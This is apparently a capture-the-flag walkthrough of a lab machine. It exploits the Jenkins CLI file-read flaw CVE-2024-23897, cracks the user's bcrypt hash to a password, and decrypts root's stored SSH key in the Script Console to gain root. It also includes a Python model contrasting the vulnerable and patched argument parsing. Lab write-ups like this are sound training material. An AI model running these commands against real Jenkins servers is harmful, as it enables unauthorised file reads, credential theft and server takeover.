Builder - Walkthrough

Builder is a medium-difficulty Linux machine that features a Jenkins instance. The Jenkins instance is found to be vulnerable to CVE-2024-23897, which allows unauthenticated users to read arbitrary files on the Jenkins controller file system. An attacker is able to extract the username and password hash of the Jenkins user jennifer. Using the credentials to log in to the remote Jenkins instance, an encrypted SSH key is exploited to obtain root access on the host machine.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- -n -Pn --disable-arp-ping -sS -sV -sC -vvv -T5 10.10.11.10 -oN builder.nmap

The scan reveals:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1
8080/tcp open  http    Jetty 10.0.18

Jenkins 2.441

The web service is running Jenkins 2.441.

Foothold

Jenkins 2.441 is vulnerable to CVE-2024-23897, an arbitrary file read vulnerability. We download the Jenkins CLI:

wget http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar

We verify the vulnerability by reading /etc/passwd:

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.10.11.10:8080' help "@/etc/passwd"
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
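Why that error output leaks file contents, as an added illustration that is not part of the original walkthrough: the CLI's argument parser (args4j) treated any argument of the form "@path" as "read this file and use its whitespace-separated contents as arguments", so when the file yielded more tokens than the command accepts, the surplus token was echoed back in the "Too many arguments" error. The Python below is a model of that behaviour, not Jenkins or args4j code; the hardened variant leaves "@" arguments untouched, which is what the Jenkins fix (2.442 and LTS 2.426.3) did by disabling the expansion. The file contents and temporary path are constructed.

```python
import os
import tempfile

class ArgError(Exception):
    """Raised the way a CLI parser reports a bad argument: the message echoes the token."""

def expand_at_files(argv):
    """Model of args4j's '@file' expansion: an argument '@/some/path' is replaced
    by the whitespace-split contents of that file before parsing begins."""
    expanded = []
    for arg in argv:
        if arg.startswith("@"):
            with open(arg[1:], encoding="utf-8", errors="replace") as fh:
                expanded.extend(fh.read().split())
        else:
            expanded.append(arg)
    return expanded

def parse_help(argv, at_syntax):
    """Toy 'help COMMAND' parser. With at_syntax=True (Jenkins <= 2.441 behaviour)
    the file's tokens become arguments and the surplus one leaks in the error.
    With at_syntax=False the literal '@path' string is the command name; nothing is read."""
    args = expand_at_files(argv) if at_syntax else list(argv)
    if len(args) > 1:
        raise ArgError("Too many arguments: " + args[1])
    return args[0] if args else None

def run_demo(file_text):
    """Write a constructed file, then parse '@<path>' both ways.
    Returns (message from the vulnerable parser or None, result from the hardened one)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "not-for-the-cli.txt")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(file_text)
        try:
            parse_help(["@" + path], at_syntax=True)
            leaked = None
        except ArgError as exc:
            leaked = str(exc)
        hardened = parse_help(["@" + path], at_syntax=False)
    return leaked, hardened

if __name__ == "__main__":
    # Constructed stand-in for a file an unauthenticated caller should never see.
    sample = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    leaked, hardened = run_demo(sample)
    print("vulnerable parser:", leaked)
    print("hardened parser  :", hardened)
```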

The vulnerability is confirmed. We read the Jenkins user configuration:

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.10.11.10:8080' connect-node "@/var/jenkins_home/users/users.xml"

This reveals a user: jennifer_12108429903186576833

We extract the user's config file:

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.10.11.10:8080' connect-node "@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml"
<passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>

We crack the bcrypt hash with John:

john hash -w=/usr/share/wordlists/rockyou.txt
Username   Password
jennifer   princess

We authenticate to Jenkins:

[Screenshot: Authenticated Jenkins]

Privilege Escalation

Once authenticated, we can abuse Jenkins to read the encrypted SSH private key stored in the Jenkins credentials store. We use the Script Console to decrypt it:

println( hudson.util.Secret.decrypt("{ENCRYPTED_KEY_HERE}") )

This decrypts root's SSH private key. We save it and connect:

chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.10

Root shell obtained:

cat /root/root.txt

Root flag: 271070df799e28e6ff721ac5a9c374e9

User flag:

su jennifer
cat /home/jennifer/user.txt

User flag: fa1c1629755c626f7d87673a0bcc6dc0